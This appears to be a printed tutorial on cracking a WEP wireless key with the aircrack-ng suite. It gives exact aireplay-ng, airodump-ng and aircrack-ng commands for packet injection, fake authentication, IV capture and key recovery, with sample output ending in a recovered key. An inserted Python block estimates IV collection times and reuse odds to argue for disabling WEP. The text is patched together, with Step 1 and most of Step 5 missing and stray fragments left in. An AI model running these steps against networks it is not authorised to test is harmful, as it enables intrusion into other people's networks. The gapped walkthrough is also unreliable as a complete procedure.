8/10/2019 Hacking WEP With Aircrack
1/9
Hacking WEP with Aircrack
This tutorial walks you through a very simple case to crack a WEP key. It is intended to build your basic skills and get you familiar with the concepts. It assumes you have a working wireless card with drivers already patched for injection.
It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.
I would like to acknowledge and thank the Aircrack-ng team (http://trac.aircrack-ng.org/wiki/Team) for producing such a great, robust tool.
Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.
Assumptions
First, this solution assumes:
You are using drivers patched for injection.
You are physically close enough to send and receive access point packets. Remember that just because you can receive packets from the access point does not mean you will be able to transmit packets to the AP. The wireless card strength is typically less than the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by the AP.
There is at least one wired or wireless client connected to the network and they are active. The reason is that this tutorial depends on receiving at least one ARP request packet, and if there are no active clients then there will never be any ARP request packets.
You are using v0.9 of aircrack-ng. If you use a different version then some of the common options may have to be changed.
Ensure all of the above assumptions are true, otherwise the advice that follows will not work.
In the examples below, you will need to change "ath0" to the interface name which is specific to your wireless card.
Equipment used
In this tutorial, here is what was used:
MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82
BSSID (MAC address of access point): 00:14:6C:7E:40:80
ESSID (Wireless network name): teddy
Access point channel: 9
Wireless interface: ath0
You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.
Solution
Solution Overview
To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs).
wifi0     no wireless extensions.
If there are any remaining athX interfaces, then stop each one. When you are finished, run "iwconfig" to ensure there are none left.
frequency, which is channel 9, and the Access Point field shows the MAC address of your wireless card. Please note that only the madwifi-ng drivers show the MAC address of your wireless card; the other drivers do not do this. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.
To match the frequency to the channel, check out:
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select the "Wifi Channel Selection and Channel Overlap" tab. This will give you the frequency for each channel.
Step 2 Test Wireless Device Packet Injection
The purpose of this step is to ensure that your card is within range of your AP and can inject packets to it.
Enter:
aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0
Where:
-9 means injection test
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
ath0 is the wireless interface name
The system should respond with:
09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35  Trying broadcast probe requests...
09:23:35  Injection is working!
09:23:37  Found 1 AP
09:23:37  Trying directed probe requests...
09:23:37  00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39  30/30: 100%
The last line is important. Ideally it should say 100% or a very high percentage. If it is low then you are too far away from the AP or too close. If it is zero then injection is not working and you need to patch your drivers or use different drivers.
Step 3 Start airodump-ng to capture the IVs
The purpose of this step is to capture the IVs generated. This step starts airodump-ng to capture the IVs from the specific access point.
Open another console session to capture the generated IVs. Then enter:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
Where:
-c 9 is the channel for the wireless network
--bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
-w output is the file name prefix for the file which will contain the IVs.
ath0 is the interface name.
While the injection is taking place (later), the screen will look similar to this:
 CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy

 BSSID              STATION            PWR  Lost  Packets  Probes
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782
Step 4 - Use aireplay-ng to do a fake authentication with the access point
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a "DeAuthentication" packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
The lack of association with the access point is the single biggest reason why injection fails. Remember the golden rule: the MAC you use for injection must be associated with the AP, by either using fake authentication or using a MAC from an already-associated client.
To associate with an access point, use fake authentication:
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Where:
-1 means fake authentication
0 reassociation timing in seconds
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
ath0 is the wireless interface name
Success looks like:
18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)
Or another variation for picky access points:
aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Where:
6000 - Reauthenticate every 6000 seconds. The long period also causes keep-alive packets to be sent.
-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 - Send keep-alive packets every 10 seconds.
Success looks like:
18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
... and so on.
Here is an example of what a failed authentication looks like:
8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request
However, a decent rate depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can be as low as 100/second and as high as 500/second.
Troubleshooting Tips
If you receive a message similar to "Got a deauth/disassoc packet. Is the source mac associated?", this means you have lost association with the AP. All your injected packets will be ignored. You must return to the fake authentication step (Step 4) and successfully associate with the AP.
Step 6 - Run aircrack-ng to obtain the WEP key
The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.
Start another console session and enter:
aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap
Where:
-z invokes the PTW WEP-cracking method.
-b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
output*.cap selects all files starting with "output" and ending in ".cap".
To also use the FMS/KoreK method, start another console session and enter:
aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
Where:
-b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
output*.cap selects all files starting with "output" and ending in ".cap".
If you are using 1.0-rc1, add the option "-K" for the FMS/KoreK attack. (1.0-rc1 defaults to PTW.)
You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.
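The IV counts above are tiny compared with what a sound cipher mode would require, and that is the structural flaw that retired WEP. This added Python example (not part of the original tutorial or of aircrack-ng) quantifies it: it converts the quoted IV counts into wall-clock time at the packet rates quoted earlier, and computes the birthday-bound probability that WEP's 24-bit IV repeats, assuming the AP picks IVs uniformly at random (an assumption; real firmware often does worse).

```python
import math

IV_BITS = 24                 # WEP prepends a 24-bit cleartext IV to the RC4 key
IV_SPACE = 2 ** IV_BITS      # 16,777,216 distinct IVs in total

# IV counts quoted in the tutorial, keyed by (method, key size in bits).
# For PTW 128-bit the upper end of the quoted 40,000-85,000 range is used.
IVS_NEEDED = {
    ("fms_korek", 64): 250_000,
    ("fms_korek", 128): 1_500_000,
    ("ptw", 64): 20_000,
    ("ptw", 128): 85_000,
}

def seconds_to_collect(ivs, packets_per_second):
    """Time to observe `ivs` data packets at a steady packet rate."""
    if packets_per_second <= 0:
        raise ValueError("packet rate must be positive")
    return ivs / packets_per_second

def minutes_to_collect(method, key_bits, packets_per_second):
    """Minutes to reach the tutorial's IV count for one method / key size."""
    return seconds_to_collect(IVS_NEEDED[(method, key_bits)], packets_per_second) / 60

def iv_reuse_probability(packets, space=IV_SPACE):
    """Birthday-bound probability that at least two of `packets` frames share an IV.
    Exact product form for uniformly random IVs, summed in log space so it stays
    accurate for hundreds of thousands of packets."""
    if packets > space:
        return 1.0
    log_p_no_reuse = sum(math.log1p(-i / space) for i in range(packets))
    return 1.0 - math.exp(log_p_no_reuse)

def packets_for_even_odds(space=IV_SPACE):
    """Packet count at which an IV repeat becomes more likely than not (~sqrt(2N ln 2))."""
    return math.ceil(math.sqrt(2 * space * math.log(2)))

if __name__ == "__main__":
    for (method, bits), ivs in IVS_NEEDED.items():
        for pps in (100, 300, 400, 500):    # packet rates quoted in the tutorial
            print(f"{method:9s} {bits:3d}-bit: {ivs:>9,} IVs at {pps} pkt/s "
                  f"-> {minutes_to_collect(method, bits, pps):7.1f} min")
    n = packets_for_even_odds()
    print(f"IV reuse is more likely than not after {n} packets "
          f"(p = {iv_reuse_probability(n):.3f}); at 250,000 packets "
          f"p = {iv_reuse_probability(250_000):.6f}")
```

The same arithmetic is why WPA2 (CCMP) and WPA3 use per-packet nonces that cannot repeat within a session key's lifetime; the numbers here are the defender's argument for disabling WEP wherever it is still offered.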
Here is what success looks like:
                                              Aircrack-ng 0.9

                              [00:03:06] Tested 674449 keys (got 96630 IVs)

   KB    depth   byte(vote)
    0    0/  1   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)
    1    0/  1   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
    2    0/  1   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
    3    1/  3   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)

                         KEY FOUND! [ 12:34:56:78:90 ]
      Probability: 100%